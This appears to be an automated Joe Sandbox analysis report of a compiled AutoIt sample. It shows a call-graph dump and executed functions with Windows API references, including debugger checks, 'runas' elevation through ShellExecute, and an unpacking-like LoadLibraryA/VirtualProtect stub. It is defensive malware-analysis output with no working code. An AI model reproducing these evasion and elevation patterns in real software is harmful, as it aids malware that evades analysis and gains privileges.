8a9af4 106129->106130 106218 8a9d8a TlsAlloc 106129->106218 106217 8a9b5c 61 API calls 2 library calls 106130->106217 106133 8a9af9 106133->106094 106134 8a9b06 106134->106130 106135 8a9b11 106134->106135 106219 8a87d5 106135->106219 106138 8a9b53 106227 8a9b5c 61 API calls 2 library calls 106138->106227 106141 8a9b32 106141->106138 106143 8a9b38 106141->106143 106142 8a9b58 106142->106094 106226 8a9a33 58 API calls 3 library calls 106143->106226 106145 8a9b40 GetCurrentThreadId 106145->106094 106147 8ad5de __initptd 106146->106147 106148 8a9c0b __lock 58 API calls 106147->106148 106149 8ad5e5 106148->106149 106150 8a87d5 __calloc_crt 58 API calls 106149->106150 106151 8ad5f6 106150->106151 106152 8ad661 GetStartupInfoW 106151->106152 106153 8ad601 __initptd @_EH4_CallFilterFunc@8 106151->106153 106154 8ad676 106152->106154 106158 8ad7a5 106152->106158 106153->106098 106157 8a87d5 __calloc_crt 58 API calls 106154->106157 106154->106158 106162 8ad6c4 106154->106162 106155 8ad86d 106241 8ad87d RtlLeaveCriticalSection _doexit 106155->106241 106157->106154 106158->106155 106159 8ad7f2 GetStdHandle 106158->106159 106160 8ad805 GetFileType 106158->106160 106240 8a9e2b InitializeCriticalSectionAndSpinCount 106158->106240 106159->106158 106160->106158 106161 8ad6f8 GetFileType 106161->106162 106162->106158 106162->106161 106239 8a9e2b InitializeCriticalSectionAndSpinCount 106162->106239 106166 8a7d06 106165->106166 106167 8b4f34 106165->106167 106171 8b4b1b GetModuleFileNameW 106166->106171 106242 8a881d 58 API calls 2 library calls 106167->106242 106169 8b4f5a _memmove 106170 8b4f70 FreeEnvironmentStringsW 106169->106170 106170->106166 106172 8b4b4f _wparse_cmdline 106171->106172 106174 8b4b8f _wparse_cmdline 106172->106174 106243 8a881d 58 API calls 2 library calls 106172->106243 106174->106105 106176 8b4d71 __wsetenvp 106175->106176 106180 8b4d69 106175->106180 106177 8a87d5 __calloc_crt 58 API calls 106176->106177 106185 8b4d9a __wsetenvp 106177->106185 106178 8b4df1 106179 8a2d55 _free 58 API calls 106178->106179 106179->106180 106180->106109 106181 8a87d5 __calloc_crt 58 API calls 106181->106185 106182 8b4e16 106183 8a2d55 _free 58 API calls 106182->106183 106183->106180 106185->106178 106185->106180 106185->106181 106185->106182 106186 8b4e2d 106185->106186 106244 8b4607 58 API calls __swprintf 106185->106244 106245 8a8dc6 IsProcessorFeaturePresent 106186->106245 106188 8b4e39 106188->106109 106191 8a30fb __IsNonwritableInCurrentImage 106189->106191 106260 8aa4d1 106191->106260 106192 8a3119 __initterm_e 106193 8a2d40 __cinit 67 API calls 106192->106193 106194 8a3138 _doexit __IsNonwritableInCurrentImage 106192->106194 106193->106194 106194->106113 106196 8847ea 106195->106196 106206 884889 106195->106206 106197 884824 745EC8D0 106196->106197 106263 8a336c 106197->106263 106201 884850 106275 8848fd SystemParametersInfoW SystemParametersInfoW 106201->106275 106203 88485c 106276 883b3a 106203->106276 106205 884864 SystemParametersInfoW 106205->106206 106206->106117 106207->106091 106208->106095 106209->106103 106213->106118 106214->106121 106215->106127 106216->106129 106217->106133 106218->106134 106221 8a87dc 106219->106221 106222 8a8817 106221->106222 106224 8a87fa 106221->106224 106228 8b51f6 106221->106228 106222->106138 106225 8a9de6 TlsSetValue 106222->106225 106224->106221 106224->106222 106236 8aa132 Sleep 106224->106236 106225->106141 106226->106145 106227->106142 106229 8b5201 106228->106229 106230 8b521c 106228->106230 106229->106230 106231 8b520d 106229->106231 106233 8b522c RtlAllocateHeap 106230->106233 106234 8b5212 106230->106234 106238 8a33a1 RtlDecodePointer 106230->106238 106237 8a8b28 58 API calls __getptd_noexit 106231->106237 106233->106230 106233->106234 106234->106221 106236->106224 106237->106234 106238->106230 106239->106162 106240->106158 106241->106153 106242->106169 106243->106174 106244->106185 106246 8a8dd1 106245->106246 106251 8a8c59 106246->106251 106250 8a8dec 106250->106188 106252 8a8c73 _memset ___raise_securityfailure 106251->106252 106253 8a8c93 IsDebuggerPresent 106252->106253 106259 8aa155 SetUnhandledExceptionFilter UnhandledExceptionFilter 106253->106259 106255 8ac5f6 __ld12tod 6 API calls 106257 8a8d7a 106255->106257 106256 8a8d57 ___raise_securityfailure 106256->106255 106258 8aa140 GetCurrentProcess TerminateProcess 106257->106258 106258->106250 106259->106256 106261 8aa4d4 RtlEncodePointer 106260->106261 106261->106261 106262 8aa4ee 106261->106262 106262->106192 106264 8a9c0b __lock 58 API calls 106263->106264 106265 8a3377 RtlDecodePointer RtlEncodePointer 106264->106265 106328 8a9d75 RtlLeaveCriticalSection 106265->106328 106267 884849 106268 8a33d4 106267->106268 106269 8a33f8 106268->106269 106270 8a33de 106268->106270 106269->106201 106270->106269 106329 8a8b28 58 API calls __getptd_noexit 106270->106329 106272 8a33e8 106330 8a8db6 9 API calls __swprintf 106272->106330 106274 8a33f3 106274->106201 106275->106203 106277 883b47 __ftell_nolock 106276->106277 106278 887667 59 API calls 106277->106278 106279 883b51 GetCurrentDirectoryW 106278->106279 106331 883766 106279->106331 106281 883b7a IsDebuggerPresent 106282 883b88 106281->106282 106283 8bd272 MessageBoxA 106281->106283 106285 8bd28c 106282->106285 106286 883ba5 106282->106286 106315 883c61 106282->106315 106283->106285 106284 883c68 SetCurrentDirectoryW 106289 883c75 Mailbox 106284->106289 106453 887213 59 API calls Mailbox 106285->106453 106412 887285 106286->106412 106289->106205 106290 8bd29c 106295 8bd2b2 SetCurrentDirectoryW 106290->106295 106295->106289 106315->106284 106328->106267 106329->106272 106330->106274 106332 887667 59 API calls 106331->106332 106333 88377c 106332->106333 106455 883d31 106333->106455 106335 88379a 106336 884706 61 API calls 106335->106336 106337 8837ae 106336->106337 106338 887de1 59 API calls 106337->106338 106339 8837bb 106338->106339 106340 884ddd 136 API calls 106339->106340 106341 8837d4 106340->106341 106342 8837dc Mailbox 106341->106342 106343 8bd173 106341->106343 106347 888047 59 API calls 106342->106347 106497 8e955b 106343->106497 106346 8bd192 106349 8a2d55 _free 58 API calls 106346->106349 106350 8837ef 106347->106350 106348 884e4a 84 API calls 106348->106346 106352 8bd19f 106349->106352 106469 88928a 106350->106469 106353 884e4a 84 API calls 106352->106353 106355 8bd1a8 106353->106355 106359 883ed0 59 API calls 106355->106359 106356 887de1 59 API calls 106357 883808 106356->106357 106358 8884c0 69 API calls 106357->106358 106360 88381a Mailbox 106358->106360 106361 8bd1c3 106359->106361 106362 887de1 59 API calls 106360->106362 106363 883ed0 59 API calls 106361->106363 106364 883840 106362->106364 106365 8bd1df 106363->106365 106366 8884c0 69 API calls 106364->106366 106367 884706 61 API calls 106365->106367 106369 88384f Mailbox 106366->106369 106368 8bd204 106367->106368 106370 883ed0 59 API calls 106368->106370 106371 887667 59 API calls 106369->106371 106372 8bd210 106370->106372 106374 88386d 106371->106374 106373 888047 59 API calls 106372->106373 106375 8bd21e 106373->106375 106472 883ed0 106374->106472 106377 883ed0 59 API calls 106375->106377 106379 8bd22d 106377->106379 106385 888047 59 API calls 106379->106385 106381 883887 106381->106355 106382 883891 106381->106382 106383 8a2efd _W_store_winword 60 API calls 106382->106383 106384 88389c 106383->106384 106384->106361 106386 8838a6 106384->106386 106387 8bd24f 106385->106387 106388 8a2efd _W_store_winword 60 API calls 106386->106388 106389 883ed0 59 API calls 106387->106389 106390 8838b1 106388->106390 106391 8bd25c 106389->106391 106390->106365 106392 8838bb 106390->106392 106391->106391 106393 8a2efd _W_store_winword 60 API calls 106392->106393 106394 8838c6 106393->106394 106394->106379 106395 883907 106394->106395 106397 883ed0 59 API calls 106394->106397 106395->106379 106396 883914 106395->106396 106399 8892ce 59 API calls 106396->106399 106398 8838ea 106397->106398 106400 888047 59 API calls 106398->106400 106401 883924 106399->106401 106402 8838f8 106400->106402 106403 889050 59 API calls 106401->106403 106404 883ed0 59 API calls 106402->106404 106405 883932 106403->106405 106404->106395 106488 888ee0 106405->106488 106407 88394f 106408 88928a 59 API calls 106407->106408 106409 888ee0 60 API calls 106407->106409 106410 883ed0 59 API calls 106407->106410 106411 883995 Mailbox 106407->106411 106408->106407 106409->106407 106410->106407 106411->106281 106413 887292 __ftell_nolock 106412->106413 106414 8872ab 106413->106414 106415 8bea22 _memset 106413->106415 106416 884750 60 API calls 106414->106416 106417 8bea3e 7523D0D0 106415->106417 106418 8872b4 106416->106418 106419 8bea8d 106417->106419 106536 8a0791 106418->106536 106421 887bcc 59 API calls 106419->106421 106423 8beaa2 106421->106423 106423->106423 106453->106290 106456 883d3e __ftell_nolock 106455->106456 106457 887bcc 59 API calls 106456->106457 106462 883ea4 Mailbox 106456->106462 106459 883d70 106457->106459 106458 8879f2 59 API calls 106458->106459 106459->106458 106468 883da6 Mailbox 106459->106468 106460 8879f2 59 API calls 106460->106468 106461 883e77 106461->106462 106463 887de1 59 API calls 106461->106463 106462->106335 106464 883e98 106463->106464 106466 883f74 59 API calls 106464->106466 106465 887de1 59 API calls 106465->106468 106466->106462 106467 883f74 59 API calls 106467->106468 106468->106460 106468->106461 106468->106462 106468->106465 106468->106467 106470 8a0db6 Mailbox 59 API calls 106469->106470 106471 8837fb 106470->106471 106471->106356 106473 883eda 106472->106473 106474 883ef3 106472->106474 106475 888047 59 API calls 106473->106475 106476 887bcc 59 API calls 106474->106476 106477 883879 106475->106477 106476->106477 106478 8a2efd 106477->106478 106479 8a2f09 106478->106479 106480 8a2f7e 106478->106480 106487 8a2f2e 106479->106487 106532 8a8b28 58 API calls __getptd_noexit 106479->106532 106534 8a2f90 60 API calls 3 library calls 106480->106534 106483 8a2f8b 106483->106381 106484 8a2f15 106533 8a8db6 9 API calls __swprintf 106484->106533 106486 8a2f20 106486->106381 106487->106381 106489 8bf17c 106488->106489 106491 888ef7 106488->106491 106489->106491 106535 888bdb 59 API calls Mailbox 106489->106535 106492 888ff8 106491->106492 106493 889040 106491->106493 106496 888fff 106491->106496 106494 8a0db6 Mailbox 59 API calls 106492->106494 106495 889d3c 60 API calls 106493->106495 106494->106496 106495->106496 106496->106407 106498 884ee5 85 API calls 106497->106498 106499 8e95ca 106498->106499 106500 8e9734 96 API calls 106499->106500 106501 8e95dc 106500->106501 106502 884f0b 74 API calls 106501->106502 106528 8bd186 106501->106528 106503 8e95f7 106502->106503 106504 884f0b 74 API calls 106503->106504 106505 8e9607 106504->106505 106506 884f0b 74 API calls 106505->106506 106507 8e9622 106506->106507 106508 884f0b 74 API calls 106507->106508 106509 8e963d 106508->106509 106510 884ee5 85 API calls 106509->106510 106511 8e9654 106510->106511 106512 8a571c __malloc_crt 58 API calls 106511->106512 106513 8e965b 106512->106513 106514 8a571c __malloc_crt 58 API calls 106513->106514 106515 8e9665 106514->106515 106516 884f0b 74 API calls 106515->106516 106517 8e9679 106516->106517 106518 8e9109 GetSystemTimeAsFileTime 106517->106518 106519 8e968c 106518->106519 106520 8e96b6 106519->106520 106521 8e96a1 106519->106521 106523 8e96bc 106520->106523 106524 8e971b 106520->106524 106522 8a2d55 _free 58 API calls 106521->106522 106526 8e96a7 106522->106526 106527 8e8b06 116 API calls 106523->106527 106525 8a2d55 _free 58 API calls 106524->106525 106525->106528 106529 8a2d55 _free 58 API calls 106526->106529 106530 8e9713 106527->106530 106528->106346 106528->106348 106529->106528 106531 8a2d55 _free 58 API calls 106530->106531 106531->106528 106532->106484 106533->106486 106534->106483 106535->106491 106537 8a079e __ftell_nolock 106536->106537 106538 8a079f GetLongPathNameW 106537->106538 106539 887bcc 59 API calls 106538->106539 106540 8872bd 106539->106540 106541 88700b 106540->106541 106542 887667 59 API calls 106541->106542 106543 88701d 106542->106543 106544 884750 60 API calls 106543->106544 106545 887028 106544->106545 106546 887033 106545->106546 106547 8be885 106545->106547 106548 883f74 59 API calls 106546->106548 106551 8be89f 106547->106551 106594 887908 61 API calls 106547->106594 106550 88703f 106548->106550 106588 8834c2 106550->106588 106589 8834d4 106588->106589 106593 8834f3 _memmove 106588->106593 106591 8a0db6 Mailbox 59 API calls 106589->106591 106590 8a0db6 Mailbox 59 API calls 106591->106593 106593->106590 106594->106547 106751 9d9a50 106752 9d9a60 106751->106752 106753 9d9b7a LoadLibraryA 106752->106753 106757 9d9bbf VirtualProtect VirtualProtect 106752->106757 106754 9d9b91 106753->106754 106754->106752 106756 9d9ba3 GetProcAddress 106754->106756 106756->106754 106759 9d9bb9 ExitProcess 106756->106759 106758 9d9c24 106757->106758 106758->106758 106760 881055 106765 882649 106760->106765 106763 8a2d40 __cinit 67 API calls 106764 881064 106763->106764 106766 887667 59 API calls 106765->106766 106767 8826b7 106766->106767 106772 883582 106767->106772 106770 882754 106771 88105a 106770->106771 106775 883416 59 API calls 2 library calls 106770->106775 106771->106763 106776 8835b0 106772->106776 106775->106770 106777 8835bd 106776->106777 106778 8835a1 106776->106778 106777->106778 106779 8835c4 RegOpenKeyExW 106777->106779 106778->106770 106779->106778 106780 8835de RegQueryValueExW 106779->106780 106781 8835ff 106780->106781 106782 883614 RegCloseKey 106780->106782 106781->106782 106782->106778 106783 881016 106788 884974 106783->106788 106786 8a2d40 __cinit 67 API calls 106787 881025 106786->106787 106789 8a0db6 Mailbox 59 API calls 106788->106789 106790 88497c 106789->106790 106791 88101b 106790->106791 106795 884936 106790->106795 106791->106786 106796 88493f 106795->106796 106797 884951 106795->106797 106798 8a2d40 __cinit 67 API calls 106796->106798 106799 8849a0 106797->106799 106798->106797 106800 887667 59 API calls 106799->106800 106801 8849b8 GetVersionExW 106800->106801 106802 887bcc 59 API calls 106801->106802 106803 8849fb 106802->106803 106804 887d2c 59 API calls 106803->106804 106813 884a28 106803->106813 106805 884a1c 106804->106805 106806 887726 59 API calls 106805->106806 106806->106813 106807 884a93 GetCurrentProcess IsWow64Process 106808 884aac 106807->106808 106810 884b2b GetSystemInfo 106808->106810 106811 884ac2 106808->106811 106809 8bd864 106812 884af8 106810->106812 106823 884b37 106811->106823 106812->106791 106813->106807 106813->106809 106816 884b1f GetSystemInfo 106818 884ae9 106816->106818 106817 884ad4 106819 884b37 2 API calls 106817->106819 106818->106812 106821 884aef FreeLibrary 106818->106821 106820 884adc GetNativeSystemInfo 106819->106820 106820->106818 106821->106812 106824 884ad0 106823->106824 106825 884b40 LoadLibraryA 106823->106825 106824->106816 106824->106817 106825->106824 106826 884b51 GetProcAddress 106825->106826 106826->106824 106827 881066 106832 88f76f 106827->106832 106829 88106c 106830 8a2d40 __cinit 67 API calls 106829->106830 106831 881076 106830->106831 106833 88f790 106832->106833 106865 89ff03 106833->106865 106837 88f7d7 106838 887667 59 API calls 106837->106838 106839 88f7e1 106838->106839 106840 887667 59 API calls 106839->106840 106841 88f7eb 106840->106841 106842 887667 59 API calls 106841->106842 106843 88f7f5 106842->106843 106844 887667 59 API calls 106843->106844 106845 88f833 106844->106845 106846 887667 59 API calls 106845->106846 106847 88f8fe 106846->106847 106875 895f87 106847->106875 106851 88f930 106852 887667 59 API calls 106851->106852 106853 88f93a 106852->106853 106903 89fd9e 106853->106903 106855 88f981 106856 88f991 GetStdHandle 106855->106856 106857 88f9dd 106856->106857 106858 8c45ab 106856->106858 106859 88f9e5 OleInitialize 106857->106859 106858->106857 106860 8c45b4 106858->106860 106859->106829 106910 8e6b38 64 API calls Mailbox 106860->106910 106862 8c45bb 106911 8e7207 CreateThread 106862->106911 106864 8c45c7 CloseHandle 106864->106859 106912 89ffdc 106865->106912 106868 89ffdc 59 API calls 106869 89ff45 106868->106869 106870 887667 59 API calls 106869->106870 106871 89ff51 106870->106871 106872 887bcc 59 API calls 106871->106872 106873 88f796 106872->106873 106874 8a0162 6 API calls 106873->106874 106874->106837 106876 887667 59 API calls 106875->106876 106877 895f97 106876->106877 106878 887667 59 API calls 106877->106878 106879 895f9f 106878->106879 106919 895a9d 106879->106919 106882 895a9d 59 API calls 106883 895faf 106882->106883 106884 887667 59 API calls 106883->106884 106885 895fba 106884->106885 106886 8a0db6 Mailbox 59 API calls 106885->106886 106887 88f908 106886->106887 106888 8960f9 106887->106888 106889 896107 106888->106889 106890 887667 59 API calls 106889->106890 106891 896112 106890->106891 106892 887667 59 API calls 106891->106892 106893 89611d 106892->106893 106894 887667 59 API calls 106893->106894 106895 896128 106894->106895 106896 887667 59 API calls 106895->106896 106897 896133 106896->106897 106898 895a9d 59 API calls 106897->106898 106899 89613e 106898->106899 106900 8a0db6 Mailbox 59 API calls 106899->106900 106901 896145 RegisterClipboardFormatW 106900->106901 106901->106851 106904 8d576f 106903->106904 106905 89fdae 106903->106905 106922 8e9ae7 60 API calls 106904->106922 106906 8a0db6 Mailbox 59 API calls 106905->106906 106908 89fdb6 106906->106908 106908->106855 106909 8d577a 106910->106862 106911->106864 106923 8e71ed 65 API calls 106911->106923 106913 887667 59 API calls 106912->106913 106914 89ffe7 106913->106914 106915 887667 59 API calls 106914->106915 106916 89ffef 106915->106916 106917 887667 59 API calls 106916->106917 106918 89ff3b 106917->106918 106918->106868 106920 887667 59 API calls 106919->106920 106921 895aa5 106920->106921 106921->106882 106922->106909 106924 15facb0 106938 15f8900 106924->106938 106926 15fad7a 106941 15faba0 106926->106941 106944 15fbdc0 GetPEB 106938->106944 106940 15f8f8b 106940->106926 106942 15faba9 Sleep 106941->106942 106943 15fabb7 106942->106943 106945 15fbdea 106944->106945 106945->106940

                                    Executed Functions

                                    Function 00883B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B68
                                    • IsDebuggerPresent.KERNEL32 ref: 00883B7A
                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,009452F8,009452E0,?,?), ref: 00883BEB
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                      • Part of subcall function 0089092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00883C14,009452F8,?,?,?), ref: 0089096E
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00883C6F
                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00937770,00000010), ref: 008BD281
                                    • SetCurrentDirectoryW.KERNEL32(?,009452F8,?,?,?), ref: 008BD2B9
                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00934260,009452F8,?,?,?), ref: 008BD33F
                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 008BD346
                                      • Part of subcall function 00883A46: GetSysColorBrush.USER32(0000000F), ref: 00883A50
                                      • Part of subcall function 00883A46: LoadCursorW.USER32(00000000,00007F00), ref: 00883A5F
                                      • Part of subcall function 00883A46: LoadIconW.USER32(00000063), ref: 00883A76
                                      • Part of subcall function 00883A46: LoadIconW.USER32(000000A4), ref: 00883A88
                                      • Part of subcall function 00883A46: LoadIconW.USER32(000000A2), ref: 00883A9A
                                      • Part of subcall function 00883A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AC0
                                      • Part of subcall function 00883A46: RegisterClassExW.USER32(?), ref: 00883B16
                                      • Part of subcall function 008839D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A03
                                      • Part of subcall function 008839D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A24
                                      • Part of subcall function 008839D5: ShowWindow.USER32(00000000,?,?), ref: 00883A38
                                      • Part of subcall function 008839D5: ShowWindow.USER32(00000000,?,?), ref: 00883A41
                                      • Part of subcall function 0088434A: _memset.LIBCMT ref: 00884370
                                      • Part of subcall function 0088434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00884415
                                    Strings
                                    • This is a third-party compiled AutoIt script., xrefs: 008BD279
                                    • runas, xrefs: 008BD33A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                    • API String ID: 529118366-3287110873
                                    • Opcode ID: 651f24e10fd483c6297cd3133587a4b4b17f44ad84583904f8da259dbb14910e
                                    • Instruction ID: 07679c57ec5430635ecad6606c2bd04e030f170048d1e818c1017d3dec4965ec
                                    • Opcode Fuzzy Hash: 651f24e10fd483c6297cd3133587a4b4b17f44ad84583904f8da259dbb14910e
                                    • Instruction Fuzzy Hash: 2351E575908248AFCB21FBF8DC15DED7B75FB46714F104066F421E2263EAA09605EB22
                                    Function 00883633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 765 883633-883681 767 8836e1-8836e3 765->767 768 883683-883686 765->768 767->768 769 8836e5 767->769 770 883688-88368f 768->770 771 8836e7 768->771 772 8836ca-8836d2 NtdllDefWindowProc_W 769->772 775 88374b-883753 PostQuitMessage 770->775 776 883695-88369a 770->776 773 8836ed-8836f0 771->773 774 8bd0cc-8bd0fa call 891070 call 891093 771->774 777 8836d8-8836de 772->777 778 8836f2-8836f3 773->778 779 883715-88373c SetTimer RegisterClipboardFormatW 773->779 808 8bd0ff-8bd106 774->808 783 883711-883713 775->783 781 8836a0-8836a2 776->781 782 8bd154-8bd168 call 8e2527 776->782 784 8836f9-88370c KillTimer call 88443a call 883114 778->784 785 8bd06f-8bd072 778->785 779->783 787 88373e-883749 CreatePopupMenu 779->787 788 8836a8-8836ad 781->788 789 883755-88375f call 8844a0 781->789 782->783 799 8bd16e 782->799 783->777 784->783 792 8bd0a8-8bd0c7 MoveWindow 785->792 793 8bd074-8bd076 785->793 787->783 796 8bd139-8bd140 788->796 797 8836b3-8836b8 788->797 800 883764 789->800 792->783 801 8bd078-8bd07b 793->801 802 8bd097-8bd0a3 SetFocus 793->802 796->772 804 8bd146-8bd14f call 8d7c36 796->804 806 8836be-8836c4 797->806 807 8bd124-8bd134 call 8e2d36 797->807 799->772 800->783 801->806 809 8bd081-8bd092 call 891070 801->809 802->783 804->772 806->772 806->808 807->783 808->772 813 8bd10c-8bd11f call 88443a call 88434a 808->813 809->783 813->772
                                    APIs
                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 008836D2
                                    • KillTimer.USER32(?,00000001), ref: 008836FC
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0088371F
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0088372A
                                    • CreatePopupMenu.USER32 ref: 0088373E
                                    • PostQuitMessage.USER32(00000000), ref: 0088374D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                    • String ID: TaskbarCreated
                                    • API String ID: 157504867-2362178303
                                    • Opcode ID: b1df4f778509dc0fe6f562e82ddfe4224e4257195c327eee53a22cd43856aff6
                                    • Instruction ID: f9fbe0330233192aaf98c6c84fcecf6dad1c230ed534df1c88066882acab63ff
                                    • Opcode Fuzzy Hash: b1df4f778509dc0fe6f562e82ddfe4224e4257195c327eee53a22cd43856aff6
                                    • Instruction Fuzzy Hash: 7941F8B2118609BBDF25BFACDC09F7D3794F711700F140535F502D62A2EA619E41B762
                                    Function 008849A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 948 8849a0-884a00 call 887667 GetVersionExW call 887bcc 953 884b0b-884b0d 948->953 954 884a06 948->954 956 8bd767-8bd773 953->956 955 884a09-884a0e 954->955 958 884b12-884b13 955->958 959 884a14 955->959 957 8bd774-8bd778 956->957 960 8bd77b-8bd787 957->960 961 8bd77a 957->961 962 884a15-884a4c call 887d2c call 887726 958->962 959->962 960->957 963 8bd789-8bd78e 960->963 961->960 971 884a52-884a53 962->971 972 8bd864-8bd867 962->972 963->955 965 8bd794-8bd79b 963->965 965->956 967 8bd79d 965->967 970 8bd7a2-8bd7a5 967->970 973 8bd7ab-8bd7c9 970->973 974 884a93-884aaa GetCurrentProcess IsWow64Process 970->974 971->970 975 884a59-884a64 971->975 976 8bd869 972->976 977 8bd880-8bd884 972->977 973->974 980 8bd7cf-8bd7d5 973->980 978 884aac 974->978 979 884aaf-884ac0 974->979 981 8bd7ea-8bd7f0 975->981 982 884a6a-884a6c 975->982 983 8bd86c 976->983 984 8bd86f-8bd878 977->984 985 8bd886-8bd88f 977->985 978->979 987 884b2b-884b35 GetSystemInfo 979->987 988 884ac2-884ad2 call 884b37 979->988 989 8bd7df-8bd7e5 980->989 990 8bd7d7-8bd7da 980->990 993 8bd7fa-8bd800 981->993 994 8bd7f2-8bd7f5 981->994 991 884a72-884a75 982->991 992 8bd805-8bd811 982->992 983->984 984->977 985->983 986 8bd891-8bd894 985->986 986->984 995 884af8-884b08 987->995 1005 884b1f-884b29 GetSystemInfo 988->1005 1006 884ad4-884ae1 call 884b37 988->1006 989->974 990->974 999 884a7b-884a8a 991->999 1000 8bd831-8bd834 991->1000 996 8bd81b-8bd821 992->996 997 8bd813-8bd816 992->997 993->974 994->974 996->974 997->974 1003 884a90 999->1003 1004 8bd826-8bd82c 999->1004 1000->974 1002 8bd83a-8bd84f 1000->1002 1007 8bd859-8bd85f 1002->1007 1008 8bd851-8bd854 1002->1008 1003->974 1004->974 1009 884ae9-884aed 1005->1009 1013 884b18-884b1d 1006->1013 1014 884ae3-884ae7 GetNativeSystemInfo 1006->1014 1007->974 1008->974 1009->995 1012 884aef-884af2 FreeLibrary 1009->1012 1012->995 1013->1014 1014->1009
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 008849CD
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    • GetCurrentProcess.KERNEL32(?,0090FAEC,00000000,00000000,?), ref: 00884A9A
                                    • IsWow64Process.KERNEL32(00000000), ref: 00884AA1
                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00884AE7
                                    • FreeLibrary.KERNEL32(00000000), ref: 00884AF2
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00884B23
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00884B2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                    • String ID:
                                    • API String ID: 1986165174-0
                                    • Opcode ID: dfcd54cb090c9ff1043668a7625ef7009df7c54075aa4e1b17fd70d685164ccf
                                    • Instruction ID: 2e6ab7c09a63cca5b59af6e3e3c3a1300f27789f968c9f9b4e23203e67a7a342
